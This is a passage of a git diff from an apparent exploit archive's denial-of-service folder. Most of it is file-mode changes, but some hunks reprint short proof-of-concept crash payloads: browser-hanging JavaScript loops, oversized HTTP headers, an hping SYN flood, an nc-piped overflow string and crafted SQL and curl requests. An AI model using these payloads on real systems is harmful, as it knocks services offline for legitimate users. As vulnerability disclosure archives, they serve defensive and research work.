versions may also be affected. -<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> \ No newline at end of file +<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> \ No newline at end of file diff --git a/platforms/multiple/dos/33729.txt b/platforms/multiple/dos/33729.txt old mode 100755 new mode 100644 index 71f3b9202..4d7ab3cf4 --- a/platforms/multiple/dos/33729.txt +++ b/platforms/multiple/dos/33729.txt @@ -37,4 +37,4 @@ alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON -alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key \ No newline at end of file +alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key \ No newline at end of file diff --git a/platforms/multiple/dos/33735.txt b/platforms/multiple/dos/33735.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33800.html b/platforms/multiple/dos/33800.html old mode 100755 new mode 100644 index cdfdcc9ce..382705df5 --- a/platforms/multiple/dos/33800.html +++ b/platforms/multiple/dos/33800.html @@ -8,4 +8,4 @@ Firefox 3.6 for Apple Mac OS X is vulnerable. NOTE: This issue was previously covered in BID 38918 (Mozilla Firefox Thunderbird and Seamonkey MFSA 2010-09 through -15 Multiple Vulnerabilities) but has been assigned its own record to better document it. -<html> <head> <title>Testcase for bug 538065</title> <style type="text/css"> span.test { background: #ff0; } </style> </head> <body> <p>U+FEFF: <span class="test">&#xfeff;</span></p> <p>U+FFF9: <span class="test">&#xfff9;</span></p> <p>U+FFFA: <span class="test">&#xfffa;</span></p> <p>U+FFFB: <span class="test">&#xfffb;</span></p> </body> </html> \ No newline at end of file +<html> <head> <title>Testcase for bug 538065</title> <style type="text/css"> span.test { background: #ff0; } </style> </head> <body> <p>U+FEFF: <span class="test">&#xfeff;</span></p> <p>U+FFF9: <span class="test">&#xfff9;</span></p> <p>U+FFFA: <span class="test">&#xfffa;</span></p> <p>U+FFFB: <span class="test">&#xfffb;</span></p> </body> </html> \ No newline at end of file diff --git a/platforms/multiple/dos/33876.c b/platforms/multiple/dos/33876.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/33879.c b/platforms/multiple/dos/33879.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3394.php b/platforms/multiple/dos/3394.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3404.php b/platforms/multiple/dos/3404.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/34058.txt b/platforms/multiple/dos/34058.txt old mode 100755 new mode 100644 index faddc63c4..4a4479a64 --- a/platforms/multiple/dos/34058.txt +++ b/platforms/multiple/dos/34058.txt @@ -6,4 +6,4 @@ DM Database Server is prone to a remote memory-corruption vulnerability. This is An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', ''); \ No newline at end of file +CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', ''); \ No newline at end of file diff --git a/platforms/multiple/dos/3407.c b/platforms/multiple/dos/3407.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/34248.txt b/platforms/multiple/dos/34248.txt old mode 100755 new mode 100644 index 3eca9ce6e..a2df23701 --- a/platforms/multiple/dos/34248.txt +++ b/platforms/multiple/dos/34248.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code in the context of the editcp 4.1 R7 is vulnerable; other versions may also be affected. -$ perl -e '{print "A"x100}' | nc www.example.com:7777 \ No newline at end of file +$ perl -e '{print "A"x100}' | nc www.example.com:7777 \ No newline at end of file diff --git a/platforms/multiple/dos/34261.txt b/platforms/multiple/dos/34261.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/34270.txt b/platforms/multiple/dos/34270.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3434.c b/platforms/multiple/dos/3434.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/34340.txt b/platforms/multiple/dos/34340.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/34360.txt b/platforms/multiple/dos/34360.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/34457.txt b/platforms/multiple/dos/34457.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/35304.txt b/platforms/multiple/dos/35304.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/35339.txt b/platforms/multiple/dos/35339.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/35359.txt b/platforms/multiple/dos/35359.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/35369.txt b/platforms/multiple/dos/35369.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/35856.html b/platforms/multiple/dos/35856.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/36007.txt b/platforms/multiple/dos/36007.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/36037.txt b/platforms/multiple/dos/36037.txt old mode 100755 new mode 100644 index d105a11d9..d77807894 --- a/platforms/multiple/dos/36037.txt +++ b/platforms/multiple/dos/36037.txt @@ -4,4 +4,4 @@ The Adobe Flash Media Server is prone to a remote denial-of-service vulnerabilit Successful exploits will allow attackers to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed. -http://www.example.com:1111/?% \ No newline at end of file +http://www.example.com:1111/?% \ No newline at end of file diff --git a/platforms/multiple/dos/36234.txt b/platforms/multiple/dos/36234.txt old mode 100755 new mode 100644 index c7e0b7e25..f3770305f --- a/platforms/multiple/dos/36234.txt +++ b/platforms/multiple/dos/36234.txt @@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte G-WAN 2.10.6 is vulnerable; other versions may also be affected. -while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n' \ No newline at end of file +while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n' \ No newline at end of file diff --git a/platforms/multiple/dos/36247.txt b/platforms/multiple/dos/36247.txt old mode 100755 new mode 100644 index d427512ba..514f2f4b3 --- a/platforms/multiple/dos/36247.txt +++ b/platforms/multiple/dos/36247.txt @@ -7,4 +7,4 @@ Exploiting this issue will exhaust system resources and cause the application to http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested -https://localhost/en-US/debug/sso \ No newline at end of file +https://localhost/en-US/debug/sso \ No newline at end of file diff --git a/platforms/multiple/dos/36288.php b/platforms/multiple/dos/36288.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/36377.txt b/platforms/multiple/dos/36377.txt old mode 100755 new mode 100644 index d1c09b34c..3ff4e55e7 --- a/platforms/multiple/dos/36377.txt +++ b/platforms/multiple/dos/36377.txt @@ -4,4 +4,4 @@ CoDeSys is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the application and deny service to legitimate users. -udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1 \ No newline at end of file +udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1 \ No newline at end of file diff --git a/platforms/multiple/dos/36378.txt b/platforms/multiple/dos/36378.txt old mode 100755 new mode 100644 index 46074efc3..717cd46f0 --- a/platforms/multiple/dos/36378.txt +++ b/platforms/multiple/dos/36378.txt @@ -4,4 +4,4 @@ CoDeSys is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the application and deny service to legitimate users. -udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1 \ No newline at end of file +udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1 \ No newline at end of file diff --git a/platforms/multiple/dos/36570.txt b/platforms/multiple/dos/36570.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/36869.txt b/platforms/multiple/dos/36869.txt old mode 100755 new mode 100644 index 8ed7caa80..3ff7a969e --- a/platforms/multiple/dos/36869.txt +++ b/platforms/multiple/dos/36869.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv IBM solidDB versions prior to 6.5.0.8 Interim Fix 6 are vulnerable. -SELECT * FROM a WHERE (b >0) AND (b IN (1,2)) \ No newline at end of file +SELECT * FROM a WHERE (b >0) AND (b IN (1,2)) \ No newline at end of file diff --git a/platforms/multiple/dos/36881.txt b/platforms/multiple/dos/36881.txt old mode 100755 new mode 100644 index 1a19d155a..35ef8c04a --- a/platforms/multiple/dos/36881.txt +++ b/platforms/multiple/dos/36881.txt @@ -138,4 +138,4 @@ contact us: Web www.security-assessment.com Email info () security-assessment com -Phone +64 4 470 1650 \ No newline at end of file +Phone +64 4 470 1650 \ No newline at end of file diff --git a/platforms/multiple/dos/37053.c b/platforms/multiple/dos/37053.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37061.txt b/platforms/multiple/dos/37061.txt old mode 100755 new mode 100644 index 9e6bfecd4..bccb22582 --- a/platforms/multiple/dos/37061.txt +++ b/platforms/multiple/dos/37061.txt @@ -4,4 +4,4 @@ Sony Bravia is prone to a remote denial-of-service vulnerability. Successful attacks will cause the application to crash, creating a denial-of-service condition. - hping -S TV.IP.Address -p anyport -i u1 --flood \ No newline at end of file + hping -S TV.IP.Address -p anyport -i u1 --flood \ No newline at end of file diff --git a/platforms/multiple/dos/3709.html b/platforms/multiple/dos/3709.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3726.c b/platforms/multiple/dos/3726.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37478.txt b/platforms/multiple/dos/37478.txt old mode 100755 new mode 100644 index f2e5617d7..46856eb69 --- a/platforms/multiple/dos/37478.txt +++ b/platforms/multiple/dos/37478.txt @@ -6,4 +6,4 @@ Attackers can execute arbitrary code in the context of the affected application. plow 0.0.5 and prior are vulnerable. -perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc \ No newline at end of file +perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc \ No newline at end of file diff --git a/platforms/multiple/dos/37487.txt b/platforms/multiple/dos/37487.txt old mode 100755 new mode 100644 index 9b391529f..bddbc4e4d --- a/platforms/multiple/dos/37487.txt +++ b/platforms/multiple/dos/37487.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to exhaust available memory, resulting in a d Apache Sling 2.1.0 and prior are vulnerable. - curl -u admin:pwd -d "" "http://example.com/content/foo/?./%40CopyFrom=../" \ No newline at end of file + curl -u admin:pwd -d "" "http://example.com/content/foo/?./%40CopyFrom=../" \ No newline at end of file diff --git a/platforms/multiple/dos/37518.html b/platforms/multiple/dos/37518.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37639.html b/platforms/multiple/dos/37639.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37721.c b/platforms/multiple/dos/37721.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3784.c b/platforms/multiple/dos/3784.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37850.txt b/platforms/multiple/dos/37850.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37852.txt b/platforms/multiple/dos/37852.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37855.txt b/platforms/multiple/dos/37855.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37859.txt b/platforms/multiple/dos/37859.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37863.txt b/platforms/multiple/dos/37863.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37864.txt b/platforms/multiple/dos/37864.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37865.txt b/platforms/multiple/dos/37865.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37871.txt b/platforms/multiple/dos/37871.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37872.txt b/platforms/multiple/dos/37872.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37873.txt b/platforms/multiple/dos/37873.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37874.txt b/platforms/multiple/dos/37874.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37877.txt b/platforms/multiple/dos/37877.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37878.txt b/platforms/multiple/dos/37878.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37882.txt b/platforms/multiple/dos/37882.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/37990.txt b/platforms/multiple/dos/37990.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38038.txt b/platforms/multiple/dos/38038.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38249.txt b/platforms/multiple/dos/38249.txt old mode 100755 new mode 100644 index 8f0212db9..7da39d7ca --- a/platforms/multiple/dos/38249.txt +++ b/platforms/multiple/dos/38249.txt @@ -8,4 +8,4 @@ MiniUPnP versions prior to 1.4 are vulnerable. M-SEARCH * HTTP/1.1 Host:239.255.255.250:1900 -ST:uuid:schemas:device:MX:3< no CRLF > \ No newline at end of file +ST:uuid:schemas:device:MX:3< no CRLF > \ No newline at end of file diff --git a/platforms/multiple/dos/383.c b/platforms/multiple/dos/383.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38364.txt b/platforms/multiple/dos/38364.txt old mode 100755 new mode 100644 index 79069e2cf..bb88e8b36 --- a/platforms/multiple/dos/38364.txt +++ b/platforms/multiple/dos/38364.txt @@ -13,4 +13,4 @@ Content-Type: text/xml; charset=utf-8 Content-Length: 99999999999999999 HTTP/1.1 200 OK -Content-Length: 2147483647 \ No newline at end of file +Content-Length: 2147483647 \ No newline at end of file diff --git a/platforms/multiple/dos/38420.txt b/platforms/multiple/dos/38420.txt old mode 100755 new mode 100644 index 30cad69a3..8fefa156b --- a/platforms/multiple/dos/38420.txt +++ b/platforms/multiple/dos/38420.txt @@ -8,4 +8,4 @@ Chromium 25.0.1364.160 is vulnerable; other versions may also be affected. Note: The content related to Mozilla Firefox Browser has been moved to BID 62969 (Mozilla Firefox Browser Cookie Verification Denial of Service Vulnerability) for better documentation. -http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st \ No newline at end of file +http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st \ No newline at end of file diff --git a/platforms/multiple/dos/38490.txt b/platforms/multiple/dos/38490.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3851.c b/platforms/multiple/dos/3851.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38595.txt b/platforms/multiple/dos/38595.txt old mode 100755 new mode 100644 index fbc9e5654..bf9b2c6b4 --- a/platforms/multiple/dos/38595.txt +++ b/platforms/multiple/dos/38595.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the host system's network to become un VirtualBox 4.2.12 is affected; other versions may also be vulnerable. -tracepath 8.8.8.8 \ No newline at end of file +tracepath 8.8.8.8 \ No newline at end of file diff --git a/platforms/multiple/dos/38616.txt b/platforms/multiple/dos/38616.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38623.html b/platforms/multiple/dos/38623.html old mode 100755 new mode 100644 index fc64b6223..6c289989f --- a/platforms/multiple/dos/38623.html +++ b/platforms/multiple/dos/38623.html @@ -6,4 +6,4 @@ Successful exploits will allow attackers to consume an excessive amount of CPU r RealPlayer 16.0.2.32 and prior are vulnerable. -<html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html> \ No newline at end of file +<html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html> \ No newline at end of file diff --git a/platforms/multiple/dos/38662.txt b/platforms/multiple/dos/38662.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/3871.html b/platforms/multiple/dos/3871.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38798.txt b/platforms/multiple/dos/38798.txt old mode 100755 new mode 100644 index c69f1ea2d..092e7caad --- a/platforms/multiple/dos/38798.txt +++ b/platforms/multiple/dos/38798.txt @@ -8,4 +8,4 @@ Firefox 19 is vulnerable; other versions may also be affected. Note: This issue was previously covered in BID 58857 (Google Chrome and Mozilla Firefox Browser Cookie Verification Security Weakness), but has been moved to its own record for better documentation. -http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st \ No newline at end of file +http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st \ No newline at end of file diff --git a/platforms/multiple/dos/38930.txt b/platforms/multiple/dos/38930.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38931.txt b/platforms/multiple/dos/38931.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38932.txt b/platforms/multiple/dos/38932.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38933.txt b/platforms/multiple/dos/38933.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38939.c b/platforms/multiple/dos/38939.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38940.c b/platforms/multiple/dos/38940.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38969.txt b/platforms/multiple/dos/38969.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38970.txt b/platforms/multiple/dos/38970.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38992.txt b/platforms/multiple/dos/38992.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38993.txt b/platforms/multiple/dos/38993.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38994.txt b/platforms/multiple/dos/38994.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38995.txt b/platforms/multiple/dos/38995.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38996.txt b/platforms/multiple/dos/38996.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38997.txt b/platforms/multiple/dos/38997.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38998.txt b/platforms/multiple/dos/38998.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/38999.txt b/platforms/multiple/dos/38999.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39000.txt b/platforms/multiple/dos/39000.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39001.txt b/platforms/multiple/dos/39001.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39002.txt b/platforms/multiple/dos/39002.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39003.txt b/platforms/multiple/dos/39003.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39004.txt b/platforms/multiple/dos/39004.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39005.txt b/platforms/multiple/dos/39005.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39006.txt b/platforms/multiple/dos/39006.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39039.txt b/platforms/multiple/dos/39039.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39076.txt b/platforms/multiple/dos/39076.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39077.txt b/platforms/multiple/dos/39077.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39082.txt b/platforms/multiple/dos/39082.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39162.txt b/platforms/multiple/dos/39162.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39163.txt b/platforms/multiple/dos/39163.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39164.txt b/platforms/multiple/dos/39164.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39165.txt b/platforms/multiple/dos/39165.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39219.txt b/platforms/multiple/dos/39219.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39321.txt b/platforms/multiple/dos/39321.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39322.txt b/platforms/multiple/dos/39322.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39323.txt b/platforms/multiple/dos/39323.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39324.txt b/platforms/multiple/dos/39324.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39325.txt b/platforms/multiple/dos/39325.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39326.txt b/platforms/multiple/dos/39326.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39327.txt b/platforms/multiple/dos/39327.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39358.txt b/platforms/multiple/dos/39358.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39365.c b/platforms/multiple/dos/39365.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39366.c b/platforms/multiple/dos/39366.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39377.c b/platforms/multiple/dos/39377.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39378.c b/platforms/multiple/dos/39378.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39379.txt b/platforms/multiple/dos/39379.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39401.txt b/platforms/multiple/dos/39401.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39426.txt b/platforms/multiple/dos/39426.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39460.txt b/platforms/multiple/dos/39460.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39461.txt b/platforms/multiple/dos/39461.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39462.txt b/platforms/multiple/dos/39462.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39463.txt b/platforms/multiple/dos/39463.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39464.txt b/platforms/multiple/dos/39464.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39465.txt b/platforms/multiple/dos/39465.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39466.txt b/platforms/multiple/dos/39466.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39467.txt b/platforms/multiple/dos/39467.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39476.txt b/platforms/multiple/dos/39476.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39482.txt b/platforms/multiple/dos/39482.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39483.txt b/platforms/multiple/dos/39483.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39484.txt b/platforms/multiple/dos/39484.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39490.txt b/platforms/multiple/dos/39490.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39503.txt b/platforms/multiple/dos/39503.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39529.txt b/platforms/multiple/dos/39529.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39551.txt b/platforms/multiple/dos/39551.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39604.txt b/platforms/multiple/dos/39604.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39633.txt b/platforms/multiple/dos/39633.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39634.txt b/platforms/multiple/dos/39634.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39635.txt b/platforms/multiple/dos/39635.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39644.txt b/platforms/multiple/dos/39644.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39649.txt b/platforms/multiple/dos/39649.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39650.txt b/platforms/multiple/dos/39650.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39652.txt b/platforms/multiple/dos/39652.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39748.txt b/platforms/multiple/dos/39748.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39749.txt b/platforms/multiple/dos/39749.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39750.txt b/platforms/multiple/dos/39750.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39767.txt b/platforms/multiple/dos/39767.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39768.txt b/platforms/multiple/dos/39768.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39799.txt b/platforms/multiple/dos/39799.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39812.txt b/platforms/multiple/dos/39812.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39824.txt b/platforms/multiple/dos/39824.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39825.txt b/platforms/multiple/dos/39825.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39826.txt b/platforms/multiple/dos/39826.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39827.txt b/platforms/multiple/dos/39827.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39828.txt b/platforms/multiple/dos/39828.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39829.txt b/platforms/multiple/dos/39829.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39830.txt b/platforms/multiple/dos/39830.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39831.txt b/platforms/multiple/dos/39831.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39834.txt b/platforms/multiple/dos/39834.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39835.txt b/platforms/multiple/dos/39835.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39859.txt b/platforms/multiple/dos/39859.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39860.txt b/platforms/multiple/dos/39860.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39861.txt b/platforms/multiple/dos/39861.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39862.txt b/platforms/multiple/dos/39862.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39863.txt b/platforms/multiple/dos/39863.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39867.py b/platforms/multiple/dos/39867.py index 62cf5b75c..375a37383 100755 --- a/platforms/multiple/dos/39867.py +++ b/platforms/multiple/dos/39867.py @@ -94,5 +94,4 @@ def _start(): sys.exit(0) if __name__ == '__main__': - _start() - \ No newline at end of file + _start() \ No newline at end of file diff --git a/platforms/multiple/dos/39877.txt b/platforms/multiple/dos/39877.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39882.txt b/platforms/multiple/dos/39882.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39906.txt b/platforms/multiple/dos/39906.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/39929.c b/platforms/multiple/dos/39929.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40031.txt b/platforms/multiple/dos/40031.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40032.txt b/platforms/multiple/dos/40032.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40034.txt b/platforms/multiple/dos/40034.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40035.txt b/platforms/multiple/dos/40035.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40036.txt b/platforms/multiple/dos/40036.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40037.txt b/platforms/multiple/dos/40037.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40087.txt b/platforms/multiple/dos/40087.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40088.txt b/platforms/multiple/dos/40088.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40089.txt b/platforms/multiple/dos/40089.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40090.txt b/platforms/multiple/dos/40090.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40095.txt b/platforms/multiple/dos/40095.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40096.txt b/platforms/multiple/dos/40096.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40097.txt b/platforms/multiple/dos/40097.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40098.txt b/platforms/multiple/dos/40098.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40099.txt b/platforms/multiple/dos/40099.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/dos/40100.txt b/platforms/multiple/dos/40100.txt old mode 100755 new mode 100644 